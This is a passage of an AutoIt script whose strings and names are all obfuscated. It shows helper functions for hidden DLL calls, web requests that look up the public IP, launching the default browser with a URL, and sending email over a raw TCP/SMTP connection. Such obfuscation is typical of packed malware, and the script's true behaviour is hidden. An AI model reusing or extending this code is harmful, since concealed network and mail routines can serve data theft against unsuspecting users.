  5552.     Local $a5082710732 = a0bd0d04a04(BitOR($a09c9804f35, $a17c9401a48))
  5553.     If @error Then Return SetError(@error, @extended, False)
  5554.     a2fd0e03a10($a5082710732, $a581cb1040a, True)
  5555.     Local $a3182a1024a = @error
  5556.     Local $a4382b16262 = @extended
  5557.     Local $a0182c13d56 = False
  5558.     If NOT @error Then
  5559.         Local $a505a20190d = DllCall($a101cc12723, $a541cd10e47, $a601ce12e0d, $a041cf10008, $a0d1c910a17, $a522c013303, $a4c1ca1122b)
  5560.         If @error Then
  5561.             $a3182a1024a = @error
  5562.             $a4382b16262 = @extended
  5563.         ElseIf $a505a20190d[Number($a432c110a08)] Then
  5564.             $a0182c13d56 = True
  5565.         Else
  5566.             $a3182a1024a = Number($a372c214b1e)
  5567.             $a4382b16262 = a3e00102e0a()
  5568.         EndIf
  5569.         a2fd0e03a10($a5082710732, $a092c313f1a, False)
  5570.         If @error Then $a3182a1024a = Number($a602c411646)
  5571.     EndIf
  5572.     a4100c04723($a5082710732)
  5573.     Return SetError($a3182a1024a, $a4382b16262, $a0182c13d56)
  5574. EndFunc
  5575.  
  5576. Func a4e31203f33($a2e2c514a3b, $a602c614202, $a502c71360f, $a5c2c810e0b, $a4e2c911459, $a5c2ca13740, $a342cb10a58)
  5577.     If NOT IsDeclared("SSA4E31203F33") Then
  5578.         Global $a252cf10f1d = a2b00005424($os[4987]), $a413c014a4d = a2b00005424($os[4988]), $a413c113943 = a2b00005424($os[4989]), $a263c212545 = a2b00005424($os[4990]), $a223c312f20 = a2b00005424($os[4991]), $a033c410860 = a2b00005424($os[4992]), $a1d3c512c2a = a2b00005424($os[4993]), $a3a3c61141b = a2b00005424($os[4994]), $a343c714c61 = a2b00005424($os[4995]), $a003c813502 = a2b00005424($os[4996]), $a3c3c914720 = a2b00005424($os[4997]), $a1e3ca12135 = a2b00005424($os[4998]), $a063cb1394b = a2b00005424($os[4999]), $a133cc15f09 = a2b00005424($os[5000]), $a153cd13e20 = a2b00005424($os[5001]), $a3f3ce1402e = a2b00005424($os[5002]), $a363cf14648 = a2b00005424($os[5003]), $a614c011605 = a2b00005424($os[5004]), $a364c112112 = a2b00005424($os[5005])
  5579.         Global $ssa4e31203f33 = 1
  5580.     EndIf
  5581.     Local $a602cc12e2b = a3c90104f55($a602c614202)
  5582.     Local $a462cd12d38 = a3c90104f55($a4e2c911459)
  5583.     Local $a122ce1450e = DllStructCreate($a6138802415)
  5584.     DllStructSetData($a122ce1450e, $a252cf10f1d, $a2e2c514a3b)
  5585.     DllStructSetData($a122ce1450e, $a413c014a4d, DllStructGetData($a602cc12e2b, Number($a413c113943)))
  5586.     a13e0a0520c($a502c71360f, DllStructGetPtr($a122ce1450e, $a263c212545), DllStructGetSize($a502c71360f))
  5587.     DllStructSetData($a122ce1450e, $a223c312f20, $a5c2c810e0b)
  5588.     DllStructSetData($a122ce1450e, $a033c410860, DllStructGetData($a462cd12d38, Number($a1d3c512c2a)))
  5589.     a13e0a0520c($a5c2ca13740, DllStructGetPtr($a122ce1450e, $a3a3c61141b), DllStructGetSize($a5c2ca13740))
  5590.     DllStructSetData($a122ce1450e, $a343c714c61, $a342cb10a58)
  5591.     Local $a5082710732 = a0bd0d04a04(BitOR($a09c9804f35, $a17c9401a48))
  5592.     If @error Then Return SetError(@error, @extended, False)
  5593.     a2fd0e03a10($a5082710732, $a003c813502, True)
  5594.     Local $a3182a1024a = @error
  5595.     Local $a4382b16262 = @extended
  5596.     Local $a0182c13d56 = False
  5597.     If NOT @error Then
  5598.         Local $a505a20190d = DllCall($a3c3c914720, $a1e3ca12135, $a063cb1394b, $a133cc15f09, $a122ce1450e)
  5599.         If @error Then
  5600.             $a3182a1024a = @error
  5601.             $a4382b16262 = @extended
  5602.         ElseIf $a505a20190d[Number($a153cd13e20)] Then
  5603.             $a4382b16262 = Number($a3f3ce1402e)
  5604.             $a0182c13d56 = True
  5605.         Else
  5606.             $a3182a1024a = Number($a363cf14648)
  5607.             $a4382b16262 = a3e00102e0a()
  5608.         EndIf
  5609.         a2fd0e03a10($a5082710732, $a614c011605, False)
  5610.         If @error Then $a3182a1024a = Number($a364c112112)
  5611.     EndIf
  5612.     a4100c04723($a5082710732)
  5613.     Return SetError($a3182a1024a, $a4382b16262, $a0182c13d56)
  5614. EndFunc
  5615.  
  5616. Func a5031303817(ByRef $a3f2af1105a)
  5617.     If NOT IsDeclared("SSA5031303817") Then
  5618.         Global $a204c211545 = a2b00005424($os[5006]), $a554c313325 = a2b00005424($os[5007]), $a224c41081c = a2b00005424($os[5008]), $a5e4c514356 = a2b00005424($os[5009]), $a484c610749 = a2b00005424($os[5010]), $a0c4c71105c = a2b00005424($os[5011]), $a184c810512 = a2b00005424($os[5012]), $a3f4c911f58 = a2b00005424($os[5013]), $a534ca14c55 = a2b00005424($os[5014]), $a384cb15100 = a2b00005424($os[5015]), $a1f4cc10c01 = a2b00005424($os[5016]), $a474cd1132d = a2b00005424($os[5017]), $a554ce10536 = a2b00005424($os[5018]), $a3b4cf1081a = a2b00005424($os[5019]), $a3f5c013e1f = a2b00005424($os[5020]), $a165c112310 = a2b00005424($os[5021]), $a495c21093f = a2b00005424($os[5022])
  5619.         Global $ssa5031303817 = 1
  5620.     EndIf
  5621.     Local $a2fbb115443[Number($a204c211545)]
  5622.     $a2fbb115443[Number($a554c313325)] = DllStructGetData($a3f2af1105a, $a224c41081c)
  5623.     $a2fbb115443[Number($a5e4c514356)] = DllStructGetData($a3f2af1105a, $a484c610749)
  5624.     $a2fbb115443[Number($a0c4c71105c)] = DllStructGetData($a3f2af1105a, $a184c810512)
  5625.     $a2fbb115443[Number($a3f4c911f58)] = DllStructGetData($a3f2af1105a, $a534ca14c55)
  5626.     $a2fbb115443[Number($a384cb15100)] = DllStructGetData($a3f2af1105a, $a1f4cc10c01)
  5627.     $a2fbb115443[Number($a474cd1132d)] = DllStructGetData($a3f2af1105a, $a554ce10536)
  5628.     $a2fbb115443[Number($a3b4cf1081a)] = DllStructGetData($a3f2af1105a, $a3f5c013e1f)
  5629.     $a2fbb115443[Number($a165c112310)] = DllStructGetData($a3f2af1105a, $a495c21093f)
  5630.     Return $a2fbb115443
  5631. EndFunc
  5632.  
  5633. Func a4a31403a27(ByRef $a3f2af1105a, $a0e6b913c1d = 0)
  5634.     If NOT IsDeclared("SSA4A31403A27") Then
  5635.         Global $a465c313e4b = a2b00005424($os[5023]), $a045c41380a = a2b00005424($os[5024]), $a595c510811 = a2b00005424($os[5025]), $a395c610d50 = a2b00005424($os[5026]), $a145c711b41 = a2b00005424($os[5027]), $a4a5c810253 = a2b00005424($os[5028]), $a475c915d22 = a2b00005424($os[5029]), $a3a5ca1222a = a2b00005424($os[5030])
  5636.         Global $ssa4a31403a27 = 1
  5637.     EndIf
  5638.     Local $a2fbb115443 = a5031303817($a3f2af1105a)
  5639.     If @error Then Return SetError(@error, @extended, "")
  5640.     If $a0e6b913c1d Then
  5641.         Return StringFormat($a465c313e4b, $a2fbb115443[Number($a045c41380a)], $a2fbb115443[Number($a595c510811)], $a2fbb115443[Number($a395c610d50)])
  5642.     Else
  5643.         Return StringFormat($a145c711b41, $a2fbb115443[Number($a4a5c810253)], $a2fbb115443[Number($a475c915d22)], $a2fbb115443[Number($a3a5ca1222a)])
  5644.     EndIf
  5645. EndFunc
  5646.  
  5647. Func a6331504a57(ByRef $a3f2af1105a, $a0e6b913c1d = 0)
  5648.     If NOT IsDeclared("SSA6331504A57") Then
  5649.         Global $a1b5cb10441 = a2b00005424($os[5031]), $a325cc12752 = a2b00005424($os[5032]), $a315cd11303 = a2b00005424($os[5033]), $a435ce14f26 = a2b00005424($os[5034]), $a245cf14126 = a2b00005424($os[5035]), $a346c011338 = a2b00005424($os[5036]), $a196c111e5c = a2b00005424($os[5037]), $a516c21322f = a2b00005424($os[5038]), $a2c6c31501c = a2b00005424($os[5039]), $a406c41431f = a2b00005424($os[5040]), $a2d6c515513 = a2b00005424($os[5041]), $a2a6c610754 = a2b00005424($os[5042]), $a546c711202 = a2b00005424($os[5043]), $a596c815f3a = a2b00005424($os[5044])
  5650.         Global $ssa6331504a57 = 1
  5651.     EndIf
  5652.     Local $a2fbb115443 = a5031303817($a3f2af1105a)
  5653.     If @error Then Return SetError(@error, @extended, "")
  5654.     If $a0e6b913c1d Then
  5655.         Return StringFormat($a1b5cb10441, $a2fbb115443[Number($a325cc12752)], $a2fbb115443[Number($a315cd11303)], $a2fbb115443[Number($a435ce14f26)], $a2fbb115443[Number($a245cf14126)], $a2fbb115443[Number($a346c011338)], $a2fbb115443[Number($a196c111e5c)])
  5656.     Else
  5657.         Return StringFormat($a516c21322f, $a2fbb115443[Number($a2c6c31501c)], $a2fbb115443[Number($a406c41431f)], $a2fbb115443[Number($a2d6c515513)], $a2fbb115443[Number($a2a6c610754)], $a2fbb115443[Number($a546c711202)], $a2fbb115443[Number($a596c815f3a)])
  5658.     EndIf
  5659. EndFunc
  5660.  
  5661. Func a2f31602441($a1dfa811711)
  5662.     If NOT IsDeclared("SSA2F31602441") Then
  5663.         Global $a246c916021 = a2b00005424($os[5045]), $a336ca1515e = a2b00005424($os[5046]), $a216cb11c03 = a2b00005424($os[5047]), $a046cc12604 = a2b00005424($os[5048]), $a306cd12748 = a2b00005424($os[5049]), $a236ce11931 = a2b00005424($os[5050]), $a526cf15717 = a2b00005424($os[5051])
  5664.         Global $ssa2f31602441 = 1
  5665.     EndIf
  5666.     Local $a426b111f50 = DllStructCreate($a383840554a)
  5667.     Local $a505a20190d = DllCall($a246c916021, $a336ca1515e, $a216cb11c03, $a046cc12604, $a1dfa811711, $a306cd12748, $a426b111f50)
  5668.     If @error Then Return SetError(@error, @extended, Number($a236ce11931))
  5669.     Return SetExtended($a505a20190d[Number($a526cf15717)], $a426b111f50)
  5670. EndFunc
  5671.  
  5672. Func a0a3170101e(ByRef $a3f2af1105a)
  5673.     If NOT IsDeclared("SSA0A3170101E") Then
  5674.         Global $a4c7c010757 = a2b00005424($os[5052]), $a5e7c11024f = a2b00005424($os[5053]), $a3e7c213e1d = a2b00005424($os[5054]), $a617c31221c = a2b00005424($os[5055])
  5675.         Global $ssa0a3170101e = 1
  5676.     EndIf
  5677.     Local $a2fbb115443 = a5031303817($a3f2af1105a)
  5678.     Return StringFormat($a4c7c010757, $a2fbb115443[Number($a5e7c11024f)], $a2fbb115443[Number($a3e7c213e1d)], $a2fbb115443[Number($a617c31221c)])
  5679. EndFunc
  5680.  
  5681. Func a5531806160($a557c41353b, $a597c51162e = 0)
  5682.     If NOT IsDeclared("SSA5531806160") Then
  5683.         Global $a537c710000 = a2b00005424($os[5056]), $a167c810a04 = a2b00005424($os[5057]), $a2b7c912214 = a2b00005424($os[5058]), $a5e7ca13d50 = a2b00005424($os[5059]), $a1a7cb12a3b = a2b00005424($os[5060]), $a0c7cc14f62 = a2b00005424($os[5061]), $a5e7cd10e15 = a2b00005424($os[5062]), $a137ce14e03 = a2b00005424($os[5063])
  5684.         Global $ssa5531806160 = 1
  5685.     EndIf
  5686.     Local $a477c615a20 = DllStructCreate($a3538605c61)
  5687.     Local $a505a20190d = DllCall($a537c710000, $a167c810a04, $a2b7c912214, $a5e7ca13d50, $a597c51162e, $a1a7cb12a3b, $a557c41353b, $a0c7cc14f62, $a477c615a20)
  5688.     If @error Then Return SetError(@error, @extended, Number($a5e7cd10e15))
  5689.     Return SetExtended($a505a20190d[Number($a137ce14e03)], $a477c615a20)
  5690. EndFunc
  5691.  
  5692. Func a3d31900800($a0efb715d2f, $a597c51162e = 0)
  5693.     If NOT IsDeclared("SSA3D31900800") Then
  5694.         Global $a128c01275e = a2b00005424($os[5064]), $a558c112717 = a2b00005424($os[5065]), $a168c211c37 = a2b00005424($os[5066]), $a3d8c31174c = a2b00005424($os[5067]), $a278c413832 = a2b00005424($os[5068]), $a608c51153b = a2b00005424($os[5069]), $a368c61485f = a2b00005424($os[5070]), $a418c716163 = a2b00005424($os[5071])
  5695.         Global $ssa3d31900800 = 1
  5696.     EndIf
  5697.     Local $a0c7cf13901 = DllStructCreate($a3538605c61)
  5698.     Local $a505a20190d = DllCall($a128c01275e, $a558c112717, $a168c211c37, $a3d8c31174c, $a597c51162e, $a278c413832, $a0efb715d2f, $a608c51153b, $a0c7cf13901)
  5699.     If @error Then Return SetError(@error, @extended, Number($a368c61485f))
  5700.     Return SetExtended($a505a20190d[Number($a418c716163)], $a0c7cf13901)
  5701. EndFunc
  5702.  
  5703. Func a2731a00724()
  5704.     If NOT IsDeclared("SSA2731A00724") Then
  5705.         Global $a558cb11663 = a2b00005424($os[5072]), $a5b8cc1223c = a2b00005424($os[5073]), $a598cd14526 = a2b00005424($os[5074]), $a0b8ce1460c = a2b00005424($os[5075]), $a608cf1230f = a2b00005424($os[5076]), $a0f9c013f58 = a2b00005424($os[5077]), $a3e9c114c04 = a2b00005424($os[5078]), $a479c213139 = a2b00005424($os[5079]), $a209c310315 = a2b00005424($os[5080])
  5706.         Global $ssa2731a00724 = 1
  5707.     EndIf
  5708.     Local $a0f8c815460, $a268c91303d, $a0a8ca11a18
  5709.     $a268c91303d = InetRead($a558cb11663)
  5710.     $a0a8ca11a18 = BinaryToString($a268c91303d)
  5711.     $a0f8c815460 = StringRegExp($a0a8ca11a18, $a5b8cc1223c, Number($a598cd14526))
  5712.     If @error = Number($a0b8ce1460c) Then
  5713.         Return $a0f8c815460[Number($a608cf1230f)]
  5714.     EndIf
  5715.     $a268c91303d = InetRead($a0f9c013f58)
  5716.     $a0a8ca11a18 = BinaryToString($a268c91303d)
  5717.     If @error Then
  5718.         Return SetError(Number($a3e9c114c04), Number($a479c213139), -Number($a209c310315))
  5719.     EndIf
  5720.     Return $a0a8ca11a18
  5721. EndFunc
  5722.  
  5723. Func a2b31b00b1b($a0b9c410c35)
  5724.     If NOT IsDeclared("SSA2B31B00B1B") Then
  5725.         Global $a559c512b33 = a2b00005424($os[5081]), $a189c613951 = a2b00005424($os[5082]), $a4c9c714855 = a2b00005424($os[5083]), $a129cb14860 = a2b00005424($os[5084]), $a0b9cc15444 = a2b00005424($os[5085]), $a009cd15b3c = a2b00005424($os[5086]), $a3a9ce10d15 = a2b00005424($os[5087]), $a559cf12609 = a2b00005424($os[5088]), $a29ac014848 = a2b00005424($os[5089]), $a37ac114c24 = a2b00005424($os[5090]), $a16ac213905 = a2b00005424($os[5091]), $a1eac31405c = a2b00005424($os[5092]), $a10ac411b52 = a2b00005424($os[5093])
  5726.         Global $ssa2b31b00b1b = 1
  5727.     EndIf
  5728.     If StringLen($a0b9c410c35) <= Number($a559c512b33) Then Return SetError(Number($a189c613951), Number($a4c9c714855), "")
  5729.     Local $a5b9c813226
  5730.     Local $a099c913c4c
  5731.     For $a189ca16108 = Number($a129cb14860) To StringLen($a0b9c410c35)
  5732.         $a099c913c4c = $a0b9cc15444 & Hex(Asc(StringMid($a0b9c410c35, $a189ca16108, Number($a009cd15b3c))), Number($a3a9ce10d15))
  5733.         If $a099c913c4c < Number($a559cf12609) OR $a099c913c4c = Number($a29ac014848) OR $a099c913c4c = Number($a37ac114c24) OR $a099c913c4c > Number($a16ac213905) Then
  5734.             $a5b9c813226 = $a5b9c813226 & $a1eac31405c & StringRight($a099c913c4c, Number($a10ac411b52))
  5735.         Else
  5736.             $a5b9c813226 = $a5b9c813226 & Chr($a099c913c4c)
  5737.         EndIf
  5738.     Next
  5739.     Return $a5b9c813226
  5740. EndFunc
  5741.  
  5742. Func a2131c05041($a45ac51293e, $a48ac611b35 = True)
  5743.     If NOT IsDeclared("SSA2131C05041") Then
  5744.         Global $a33ac711e13 = a2b00005424($os[5094])
  5745.         Global $ssa2131c05041 = 1
  5746.     EndIf
  5747.     Local $a156e804051 = InetRead($a45ac51293e, Number($a33ac711e13))
  5748.     Local $a2fac811a32 = @error, $a3eac913662 = @extended
  5749.     If $a48ac611b35 Then $a156e804051 = BinaryToString($a156e804051)
  5750.     Return SetError($a2fac811a32, $a3eac913662, $a156e804051)
  5751. EndFunc
  5752.  
  5753. Func a1b31d0183a($a42aca1240e, $a5cacb1200d, $a06acc13659)
  5754.     If NOT IsDeclared("SSA1B31D0183A") Then
  5755.         Global $a49ace12456 = a2b00005424($os[5095]), $a46acf15443 = a2b00005424($os[5096]), $a05bc211906 = a2b00005424($os[5097]), $a30bc312833 = a2b00005424($os[5098]), $a2cbc41240c = a2b00005424($os[5099]), $a32bc51622a = a2b00005424($os[5100]), $a2cbc611b04 = a2b00005424($os[5101]), $a3bbc712c2c = a2b00005424($os[5102]), $a18bc810844 = a2b00005424($os[5103]), $a32bc91502f = a2b00005424($os[5104]), $a5cbca11234 = a2b00005424($os[5105])
  5756.         Global $ssa1b31d0183a = 1
  5757.     EndIf
  5758.     Local $a60acd1364c = Opt($a49ace12456, Number($a46acf15443))
  5759.     Local $a03bc014a37, $a54bc114647 = RegRead($a05bc211906, "")
  5760.     If $a54bc114647 = $a30bc312833 Then
  5761.         $a03bc014a37 = RegRead($a2cbc41240c, "")
  5762.     Else
  5763.         $a03bc014a37 = RegRead($a32bc51622a, "")
  5764.     EndIf
  5765.     Local $a430131125a = Run(StringReplace($a03bc014a37, $a2cbc611b04, a2b31b00b1b($a3bbc712c2c & $a42aca1240e & $a18bc810844 & $a5cacb1200d & $a32bc91502f & $a06acc13659)))
  5766.     Local $a2fac811a32 = @error, $a3eac913662 = @extended
  5767.     Opt($a5cbca11234, $a60acd1364c)
  5768.     Return SetError($a2fac811a32, $a3eac913662, $a430131125a)
  5769. EndFunc
  5770.  
  5771. Func a0631e00157($a1bbcb13918, $a35bcc1224c, $a28bcd15657, $a26bce12118, $a1bbcf14b4d = "", $a57cc015802 = "", $a05cc114a23 = "", $a4acc214e45 = " ", $a4fcc313f1d = 0)
  5772.     If NOT IsDeclared("SSA0631E00157") Then
  5773.         Global $a02cc414a42 = a2b00005424($os[5106]), $a0fcc513a2e = a2b00005424($os[5107]), $a11cc610e35 = a2b00005424($os[5108]), $a5fcc714b28 = a2b00005424($os[5109]), $a60cc81495e = a2b00005424($os[5110]), $a1fcc914a48 = a2b00005424($os[5111]), $a0ecca12848 = a2b00005424($os[5112]), $a45ccb14e30 = a2b00005424($os[5113]), $a0eccc10f2a = a2b00005424($os[5114]), $a50ccf14c3c = a2b00005424($os[5115]), $a17dc012325 = a2b00005424($os[5116]), $a0cdc114249 = a2b00005424($os[5117]), $a2fdc210f29 = a2b00005424($os[5118]), $a43dc410918 = a2b00005424($os[5119]), $a03dc510e07 = a2b00005424($os[5120]), $a62dc610a4d = a2b00005424($os[5121]), $a4bdc715210 = a2b00005424($os[5122]), $a05dc814d0e = a2b00005424($os[5123]), $a26dca11201 = a2b00005424($os[5124]), $a53dcc11060 = a2b00005424($os[5125]), $a1cdcd12c4f = a2b00005424($os[5126]), $a2edce13860 = a2b00005424($os[5127]), $a4adcf11415 = a2b00005424($os[5128]), $a40ec013f17 = a2b00005424($os[5129]), $a10ec11534c = a2b00005424($os[5130]), $a01ec213649 = a2b00005424($os[5131]), $a1aec310063 = a2b00005424($os[5132]), $a12ec41230d = a2b00005424($os[5133]), $a2bec512a17 = a2b00005424($os[5134]), $a44ec613847 = a2b00005424($os[5135]), $a15ec712e0d = a2b00005424($os[5136]), $a61ec813328 = a2b00005424($os[5137]), $a37ec914750 = a2b00005424($os[5138]), $a5eeca1225b = a2b00005424($os[5139]), $a59ecb11b4c = a2b00005424($os[5140]), $a19ecc1612a = a2b00005424($os[5141]), $a04ecd13209 = a2b00005424($os[5142]), $a02ece12a5c = a2b00005424($os[5143]), $a41ecf13a04 = a2b00005424($os[5144]), $a3dfc014855 = a2b00005424($os[5145]), $a07fc11482f = a2b00005424($os[5146]), $a5bfc213b0e = a2b00005424($os[5147]), $a52fc315225 = a2b00005424($os[5148]), $a57fc413a3b = a2b00005424($os[5149]), $a49fc51045d = a2b00005424($os[5150]), $a16fc615a08 = a2b00005424($os[5151]), $a44fc814259 = a2b00005424($os[5152]), $a4bfc91183b = a2b00005424($os[5153]), $a3efcc14e12 = a2b00005424($os[5154]), $a52fcd14e10 = a2b00005424($os[5155]), $a01fce14757 = a2b00005424($os[5156]), $a57fcf14350 = a2b00005424($os[5157])
  5774.         Global $a090d011f34 = a2b00005424($os[5158]), $a270d11052b = a2b00005424($os[5159]), $a2c0d21532c = a2b00005424($os[5160]), $a1d0d311e1b = a2b00005424($os[5161]), $a300d41393a = a2b00005424($os[5162]), $a190d51402b = a2b00005424($os[5163]), $a330d612b25 = a2b00005424($os[5164]), $a2a0d710e53 = a2b00005424($os[5165]), $a390d815412 = a2b00005424($os[5166]), $a0f0d915e18 = a2b00005424($os[5167]), $a4b0da11624 = a2b00005424($os[5168]), $a180db10b26 = a2b00005424($os[5169]), $a480dc12f0a = a2b00005424($os[5170]), $a260dd13534 = a2b00005424($os[5171]), $a1d0de10d5a = a2b00005424($os[5172]), $a5d0df10d50 = a2b00005424($os[5173]), $a331d013e5a = a2b00005424($os[5174]), $a271d11622f = a2b00005424($os[5175]), $a381d213b35 = a2b00005424($os[5176]), $a341d313b1c = a2b00005424($os[5177]), $a2a1d414c33 = a2b00005424($os[5178]), $a101d51180d = a2b00005424($os[5179]), $a3b1d610220 = a2b00005424($os[5180]), $a271d711005 = a2b00005424($os[5181]), $a4f1d814917 = a2b00005424($os[5182]), $a361d915651 = a2b00005424($os[5183]), $a3c1da1525c = a2b00005424($os[5184]), $a171db1584e = a2b00005424($os[5185]), $a091dc1091b = a2b00005424($os[5186]), $a301dd15641 = a2b00005424($os[5187]), $a051de10a58 = a2b00005424($os[5188]), $a171df10c14 = a2b00005424($os[5189]), $a612d013c5c = a2b00005424($os[5190]), $a142d112c30 = a2b00005424($os[5191]), $a192d215a4b = a2b00005424($os[5192]), $a502d31293b = a2b00005424($os[5193]), $a432d410222 = a2b00005424($os[5194]), $a322d512c08 = a2b00005424($os[5195]), $a412d61435e = a2b00005424($os[5196]), $a402d713729 = a2b00005424($os[5197]), $a092d81553c = a2b00005424($os[5198]), $a0d2d913038 = a2b00005424($os[5199]), $a512da14c4c = a2b00005424($os[5200]), $a352db1571a = a2b00005424($os[5201]), $a452dc15715 = a2b00005424($os[5202]), $a132dd16013 = a2b00005424($os[5203]), $a472de11654 = a2b00005424($os[5204]), $a1d2df14447 = a2b00005424($os[5205]), $a443d01512d = a2b00005424($os[5206]), $a043d110533 = a2b00005424($os[5207]), $a543d213020 = a2b00005424($os[5208]), $a243d313e2c = a2b00005424($os[5209])
  5775.         Global $a2d3d410338 = a2b00005424($os[5210]), $a5f3d515256 = a2b00005424($os[5211]), $a453d613f25 = a2b00005424($os[5212]), $a553d71402e = a2b00005424($os[5213]), $a3c3d81072e = a2b00005424($os[5214]), $a103d910c17 = a2b00005424($os[5215]), $a243da10258 = a2b00005424($os[5216]), $a373db10524 = a2b00005424($os[5217]), $a473dc11b4f = a2b00005424($os[5218]), $a3e3dd1563d = a2b00005424($os[5219]), $a2e3de12408 = a2b00005424($os[5220]), $a483df1515b = a2b00005424($os[5221])
  5776.         Global $ssa0631e00157 = 1
  5777.     EndIf
  5778.     If $a1bbcb13918 = "" OR $a28bcd15657 = "" OR $a26bce12118 = "" OR $a35bcc1224c = "" OR StringLen($a35bcc1224c) > Number($a02cc414a42) Then Return SetError(Number($a0fcc513a2e), Number($a11cc610e35), Number($a5fcc714b28))
  5779.     If $a05cc114a23 = "" Then $a05cc114a23 = Execute($a60cc81495e)
  5780.     If TCPStartup() = Number($a1fcc914a48) Then Return SetError(Number($a0ecca12848), Number($a45ccb14e30), Number($a0eccc10f2a))
  5781.     Local $a5accd13815, $a61cce13460
  5782.     StringRegExp($a1bbcb13918, $a50ccf14c3c)
  5783.     If @extended Then
  5784.         $a5accd13815 = $a1bbcb13918
  5785.     Else
  5786.         $a5accd13815 = TCPNameToIP($a1bbcb13918)
  5787.     EndIf
  5788.     If $a5accd13815 = "" Then
  5789.         TCPShutdown()
  5790.         Return SetError(Number($a17dc012325), Number($a0cdc114249), Number($a2fdc210f29))
  5791.     EndIf
  5792.     Local $a0ddc315161 = TCPConnect($a5accd13815, Number($a43dc410918))
  5793.     If $a0ddc315161 = -Number($a03dc510e07) Then
  5794.         TCPShutdown()
  5795.         Return SetError(Number($a62dc610a4d), Number($a4bdc715210), Number($a05dc814d0e))
  5796.     EndIf
  5797.     Local $a08dc911e16[Number($a26dca11201)], $a3ddcb16349[Number($a53dcc11060)]
  5798.     $a08dc911e16[Number($a1cdcd12c4f)] = $a2edce13860 & $a05cc114a23 & Execute($a4adcf11415)
  5799.     If StringLeft($a05cc114a23, Number($a40ec013f17)) = $a10ec11534c Then $a08dc911e16[Number($a01ec213649)] = $a05cc114a23 & Execute($a1aec310063)
  5800.     $a3ddcb16349[Number($a12ec41230d)] = $a2bec512a17
  5801.     $a08dc911e16[Number($a44ec613847)] = $a15ec712e0d & $a28bcd15657 & $a61ec813328 & Execute($a37ec914750)
  5802.     $a3ddcb16349[Number($a5eeca1225b)] = $a59ecb11b4c
  5803.     $a08dc911e16[Number($a19ecc1612a)] = $a04ecd13209 & $a26bce12118 & $a02ece12a5c & Execute($a41ecf13a04)
  5804.     $a3ddcb16349[Number($a3dfc014855)] = $a07fc11482f
  5805.     $a08dc911e16[Number($a5bfc213b0e)] = $a52fc315225 & Execute($a57fc413a3b)
  5806.     $a3ddcb16349[Number($a49fc51045d)] = $a16fc615a08
  5807.     Local $a505a20190d = a2621c0241d()
  5808.     Local $a3ffc71530a = -$a505a20190d[Number($a44fc814259)] / Number($a4bfc91183b)
  5809.     Local $a24fca11c3a = Int($a3ffc71530a)
  5810.     Local $a0bfcb10c2f = Number($a3efcc14e12)
  5811.     If $a24fca11c3a <> $a3ffc71530a Then $a0bfcb10c2f = Abs($a3ffc71530a - $a24fca11c3a) * Number($a52fcd14e10)
  5812.     $a3ffc71530a = StringFormat($a01fce14757, $a24fca11c3a, $a0bfcb10c2f)
  5813.     $a08dc911e16[Number($a57fcf14350)] = $a090d011f34 & $a35bcc1224c & $a270d11052b & $a28bcd15657 & $a2c0d21532c & Execute($a1d0d311e1b) & $a300d41393a & $a190d51402b & $a26bce12118 & $a330d612b25 & Execute($a2a0d710e53) & $a390d815412 & $a1bbcf14b4d & Execute($a0f0d915e18) & $a4b0da11624 & Execute($a180db10b26) & $a480dc12f0a & a35f0300454(Execute($a260dd13534), Number($a1d0de10d5a)) & $a5d0df10d50 & Execute($a331d013e5a) & $a271d11622f & a1c0150025d(Execute($a381d213b35), Number($a341d313b1c)) & $a2a1d414c33 & Execute($a101d51180d) & $a3b1d610220 & Execute($a271d711005) & $a4f1d814917 & Execute($a361d915651) & $a3c1da1525c & Execute($a171db1584e) & $a3ffc71530a & Execute($a091dc1091b) & $a301dd15641 & Execute($a051de10a58) & Execute($a171df10c14)
  5814.     $a3ddcb16349[Number($a612d013c5c)] = ""
  5815.     $a08dc911e16[Number($a142d112c30)] = Execute($a192d215a4b) & $a502d31293b & Execute($a432d410222)
  5816.     $a3ddcb16349[Number($a322d512c08)] = $a412d61435e
  5817.     If a5c4100244a($a0ddc315161, $a08dc911e16[Number($a402d713729)], $a3ddcb16349[Number($a092d81553c)], $a4fcc313f1d, $a0d2d913038, $a4acc214e45) Then Return SetError(Number($a512da14c4c), Number($a352db1571a), Number($a452dc15715))
  5818.     For $a61cce13460 = Number($a132dd16013) To UBound($a08dc911e16) - Number($a472de11654)
  5819.         If a5c4100244a($a0ddc315161, $a08dc911e16[$a61cce13460], $a3ddcb16349[$a61cce13460], $a4fcc313f1d) Then Return SetError(Number($a1d2df14447) + $a61cce13460, Number($a443d01512d), Number($a043d110533))
  5820.     Next
  5821.     For $a61cce13460 = Number($a543d213020) To UBound($a57cc015802) - Number($a243d313e2c)
  5822.         If StringLeft($a57cc015802[$a61cce13460], Number($a2d3d410338)) = $a5f3d515256 Then $a57cc015802[$a61cce13460] = $a453d613f25 & $a57cc015802[$a61cce13460]
  5823.         If a5c4100244a($a0ddc315161, $a57cc015802[$a61cce13460] & Execute($a553d71402e), "", $a4fcc313f1d) Then Return SetError(Number($a3c3d81072e) + $a61cce13460, Number($a103d910c17), Number($a243da10258))
  5824.     Next
  5825.     $a61cce13460 = UBound($a08dc911e16) - Number($a373db10524)
  5826.     If a5c4100244a($a0ddc315161, $a08dc911e16[$a61cce13460], $a3ddcb16349[$a61cce13460], $a4fcc313f1d) Then Return SetError(Number($a473dc11b4f), Number($a3e3dd1563d), Number($a2e3de12408))
  5827.     TCPCloseSocket($a0ddc315161)
  5828.     TCPShutdown()
  5829.     Return Number($a483df1515b)
  5830. EndFunc
  5831.  
  5832. Func a1631f05f2d($a5a4d013700, $a1c4d113013 = 0)
  5833.     If NOT IsDeclared("SSA1631F05F2D") Then
  5834.         Global $a624d311358 = a2b00005424($os[5222]), $a424d511045 = a2b00005424($os[5223]), $a074d614151 = a2b00005424($os[5224]), $a534d713f4b = a2b00005424($os[5225]), $a454d814b24 = a2b00005424($os[5226]), $a504d913543 = a2b00005424($os[5227]), $a014da15f30 = a2b00005424($os[5228]), $a524db1443d = a2b00005424($os[5229]), $a5a4dc1230c = a2b00005424($os[5230]), $a304dd1060a = a2b00005424($os[5231]), $a194de1054a = a2b00005424($os[5232]), $a5c4df12e29 = a2b00005424($os[5233]), $a555d015f63 = a2b00005424($os[5234]), $a195d11510c = a2b00005424($os[5235]), $a4e5d211b51 = a2b00005424($os[5236]), $a245d31033d = a2b00005424($os[5237]), $a505d416102 = a2b00005424($os[5238]), $a4b5d515705 = a2b00005424($os[5239]), $a395d615438 = a2b00005424($os[5240]), $a0e5d711f44 = a2b00005424($os[5241])
  5835.         Global $ssa1631f05f2d = 1
  5836.     EndIf
